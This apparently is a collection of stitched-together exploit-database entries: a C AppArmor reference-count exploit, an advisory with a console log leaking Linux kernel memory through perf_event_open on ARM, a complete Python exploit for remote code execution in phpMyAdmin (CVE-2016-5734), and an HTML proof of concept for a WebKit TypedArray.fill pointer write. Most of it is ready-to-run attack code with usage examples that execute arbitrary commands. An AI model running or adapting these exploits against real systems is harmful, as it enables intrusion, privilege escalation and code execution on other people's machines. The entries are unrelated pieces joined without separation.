#include <fcntl.h>
#include <keyutils.h>
#include <err.h>
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/apparmor.h>
#define BASE_PATH "/sys/kernel/security/apparmor/policy/profiles/sbin.dhclient.2"
#define HASH_PATH BASE_PATH "/sha1"
void add_references(int hash_fd, int refs_to_add) {
char buf[1];
for (int i = 0; i < refs_to_add; ++i) {
pread(hash_fd, buf, sizeof(buf), 0);
}
}
int main(int argc, char** argv) {
int hash_fd;
int fds[0x100];
pid_t pid;
hash_fd = open(HASH_PATH, O_RDONLY);
if (hash_fd < 0) {
err(-1, "failed to open HASH_PATH");
}
fprintf(stderr, "[*] forking to speed up initial reference count increments\n");
for (int i = 0; i < 0xf; ++i) {
if (!fork()) {
add_references(hash_fd, 0x11111100);
exit(0);
}
}
for (int i = 0; i < 0xf; ++i) {
int status;
wait(&status);
}
fprintf(stderr, "[*] initial reference count increase finished\n");
fprintf(stderr, "[*] entering profile\n");
aa_change_profile("/sbin/dhclient");
pid = fork();
if (pid) {
for (int i = 0; i < 0x100; ++i) {
fds[i] = open("/proc/self/net/arp", O_RDONLY);
}
}
else {
add_references(hash_fd, 0x100);
exit(0);
}
fprintf(stderr, "[*] past the point of no return");
sleep(5);
for (int i = 0; i < 0x100; ++i) {
close(fds[i]);
}
}
perf_event_open() offers to collect various pieces of information when an event occurs, including a user stack backtrace (PERF_SAMPLE_CALLCHAIN). To collect a user stack backtrace, the kernel grabs the userland register state (if the event occured in kernelspace: the userland register state that was recorded on syscall entry), then walks the stackframes by following framepointers.
On ARM, the step from one stackframe to the next one is implemented in arch/arm/kernel/perf_callchain.c as follows:
/*
* Get the return address for a single stackframe and return a pointer to the
* next frame tail.
*/
static struct frame_tail __user *
user_backtrace(struct frame_tail __user *tail,
struct perf_callchain_entry *entry)
{
struct frame_tail buftail;
unsigned long err;
if (!access_ok(VERIFY_READ, tail, sizeof(buftail)))
return NULL;
pagefault_disable();
err = __copy_from_user_inatomic(&buftail, tail, sizeof(buftail));
pagefault_enable();
if (err)
return NULL;
perf_callchain_store(entry, buftail.lr);
/*
* Frame pointers should strictly progress back up the stack
* (towards higher addresses).
*/
if (tail + 1 >= buftail.fp)
return NULL;
return buftail.fp - 1;
}
The access_ok() check is intended to prevent a malicious userland process from abusing the perf_event_open() API to leak kernelspace data. However, access_ok() does not actually check anything in set_fs(KERNEL_DS) sections, and performance events can occur in pretty much any context. Therefore, by causing a performance event to fire while e.g. the splice() syscall is running under KERNEL_DS, an attacker can circumvent this protection.
(The "tail + 1 >= buftail.fp" check has no relevance for an attacker; kernelspace addresses are higher than userspace addresses.)
After circumventing the protection, the attacker can set up a stackframe whose frame pointer points to an arbitrary kernelspace address. The kernel will follow that frame pointer, read the "saved link register" through it and make the result accessible to userspace. Therefore, this vulnerability can be used to read arbitrary kernelspace data.
The attached exploit can be used to leak 4 bytes at an arbitrary address, like this (tested on a Nexus 6, which runs a kernel based on upstream version 3.10, with a userdebug build that allows the shell user to get a root shell using "su"):
shell@shamu:/ $ su
root@shamu:/ # echo 0 > /proc/sys/kernel/kptr_restrict
root@shamu:/ # grep max_lock_depth /proc/kallsyms
c1042dc0 D max_lock_depth
root@shamu:/ # exit
shell@shamu:/ $ cat /proc/sys/kernel/max_lock_depth
1025
shell@shamu:/ $ /data/local/tmp/poc 0xc1042dc0
attempting to leak 0xc1042dc0
fake stackframe: fp=0xbeafd920
data_head is at e8
SUCCESS: 0x00000401
SUCCESS: 0x00000401
shell@shamu:/ $ su
root@shamu:/ # echo 4100 > /proc/sys/kernel/max_lock_depth
root@shamu:/ # exit
shell@shamu:/ $ /data/local/tmp/poc 0xc1042dc0
attempting to leak 0xc1042dc0
fake stackframe: fp=0xbecbd920
data_head is at e8
SUCCESS: 0x00001004
SUCCESS: 0x00001004
(The number behind the "SUCCESS: " message is the leaked value.)
On recent kernels, the issue could be attacked more reliably using software events or tracepoints - however, before commit b3eac026 (first contained in Linux 4.2), there is no implementation of perf_arch_fetch_caller_regs() on ARM, making it impossible to exploit the issue that way.
The arm64 implementation seems to have the same issues as the arm implementation. The x86 code also looks dodgy and has an access_ok() check, but can't be exploited this way because of the valid_user_frame() check that occurs directly after the values have been read through the potentially-kernelspace pointer.
Regarding other architectures (which I haven't looked into in much detail because they seem less important): Interestingly, sparc already has a safe implementation that explicitly uses set_fs(USER_DS) to make access_ok() safe. tile doesn't seem to even make an effort to differentiate between kernelspace and userspace stacks at a first glance. xtensa has some code, but it looks dodgy. metag also has the bad access_ok() check, but does some sanity checking afterwards that makes it harder to attack. The powerpc code looks secure.
I have attached a completely untested patch that should fix the x86, arm and arm64 code.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40182.zip
#!/usr/bin/env python
"""cve-2016-5734.py: PhpMyAdmin 4.3.0 - 4.6.2 authorized user RCE exploit
Details: Working only at PHP 4.3.0-5.4.6 versions, because of regex break with null byte fixed in PHP 5.4.7.
CVE: CVE-2016-5734
Author: https://twitter.com/iamsecurity
run: ./cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"
"""
import requests
import argparse
import sys
__author__ = "@iamsecurity"
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("url", type=str, help="URL with path to PMA")
parser.add_argument("-c", "--cmd", type=str, help="PHP command(s) to eval()")
parser.add_argument("-u", "--user", required=True, type=str, help="Valid PMA user")
parser.add_argument("-p", "--pwd", required=True, type=str, help="Password for valid PMA user")
parser.add_argument("-d", "--dbs", type=str, help="Existing database at a server")
parser.add_argument("-T", "--table", type=str, help="Custom table name for exploit.")
arguments = parser.parse_args()
url_to_pma = arguments.url
uname = arguments.user
upass = arguments.pwd
if arguments.dbs:
db = arguments.dbs
else:
db = "test"
token = False
custom_table = False
if arguments.table:
custom_table = True
table = arguments.table
else:
table = "prgpwn"
if arguments.cmd:
payload = arguments.cmd
else:
payload = "system('uname -a');"
size = 32
s = requests.Session()
# you can manually add proxy support it's very simple ;)
# s.proxies = {'http': "127.0.0.1:8080", 'https': "127.0.0.1:8080"}
s.verify = False
sql = '''CREATE TABLE `{0}` (
`first` varchar(10) CHARACTER SET utf8 NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
INSERT INTO `{0}` (`first`) VALUES (UNHEX('302F6500'));
'''.format(table)
# get_token
resp = s.post(url_to_pma + "/?lang=en", dict(
pma_username=uname,
pma_password=upass
))
if resp.status_code is 200:
token_place = resp.text.find("token=") + 6
token = resp.text[token_place:token_place + 32]
if token is False:
print("Cannot get valid authorization token.")
sys.exit(1)
if custom_table is False:
data = {
"is_js_confirmed": "0",
"db": db,
"token": token,
"pos": "0",
"sql_query": sql,
"sql_delimiter": ";",
"show_query": "0",
"fk_checks": "0",
"SQL": "Go",
"ajax_request": "true",
"ajax_page_request": "true",
}
resp = s.post(url_to_pma + "/import.php", data, cookies=requests.utils.dict_from_cookiejar(s.cookies))
if resp.status_code == 200:
if "success" in resp.json():
if resp.json()["success"] is False:
first = resp.json()["error"][resp.json()["error"].find("<code>")+6:]
error = first[:first.find("</code>")]
if "already exists" in error:
print(error)
else:
print("ERROR: " + error)
sys.exit(1)
# build exploit
exploit = {
"db": db,
"table": table,
"token": token,
"goto": "sql.php",
"find": "0/e\0",
"replaceWith": payload,
"columnIndex": "0",
"useRegex": "on",
"submit": "Go",
"ajax_request": "true"
}
resp = s.post(
url_to_pma + "/tbl_find_replace.php", exploit, cookies=requests.utils.dict_from_cookiejar(s.cookies)
)
if resp.status_code == 200:
result = resp.json()["message"][resp.json()["message"].find("</a>")+8:]
if len(result):
print("result: " + result)
sys.exit(0)
print(
"Exploit failed!\n"
"Try to manually set exploit parameters like --table, --database and --token.\n"
"Remember that servers with PHP version greater than 5.4.6"
" is not exploitable, because of warning about null byte in regexp"
)
sys.exit(1)
<!--
There is a bug in TypedArray.fill that can be used to write to an absolute pointer.
In JavaScriptCore/runtime/JSGenericTypedArrayViewPrototypeFunctions.h, the function genericTypedArrayViewProtoFuncFill contains the following code:
unsigned length = thisObject->length();
unsigned begin = argumentClampedIndexFromStartOrEnd(exec, 1, length);
unsigned end = argumentClampedIndexFromStartOrEnd(exec, 2, length, length);
if (end < begin)
return JSValue::encode(exec->thisValue());
if (!thisObject->setRangeToValue(exec, begin, end, valueToInsert))
return JSValue::encode(jsUndefined());
argumentClampedIndexFromStartOrEnd will call valueOf on a parameter to the fill function, which can contain a function that neuters the this array, causing the pointer used by setRangeToValue to be null. However, the begin and end variables can be very large values, up to 0x7fffffff, which could be valid pointers on ARM and 32-bit platforms. This allows an absolute pointer in this range to be written to.
An HTML file demonstrating this issue is attached. This issue affects Safari Technology Preview and WebKit, but has not made it into production Safari yet (TypedArray.fill is not supported).
Note that there are three places that code can be excuted after the neutered check in this function, the begin and end parameter, and the value, which is converted in setRangeToValue. To fix this issue, a check needs to be performed after the value has been converted.
-->
<html>
<body>
<script>
function f(){
try{
alert("t");
postMessage("test", "http://127.0.0.1", [q])
alert(a.byteLength);
alert(q.byteLength);
} catch(e){
alert(e.message);
alert(a.byteLength)
alert(q.byteLength);
}
return 0x12345678;
}
alert(Date);
var q = new ArrayBuffer(0x7fffffff);
var o = {valueOf : f}
var a = new Uint8Array(q);
// alert(q.byteLength);
var t = [];
try{
a.fill(0x12, o, 0x77777777);
} catch(e){
alert(e.message);
}
</script>
</body>
</html>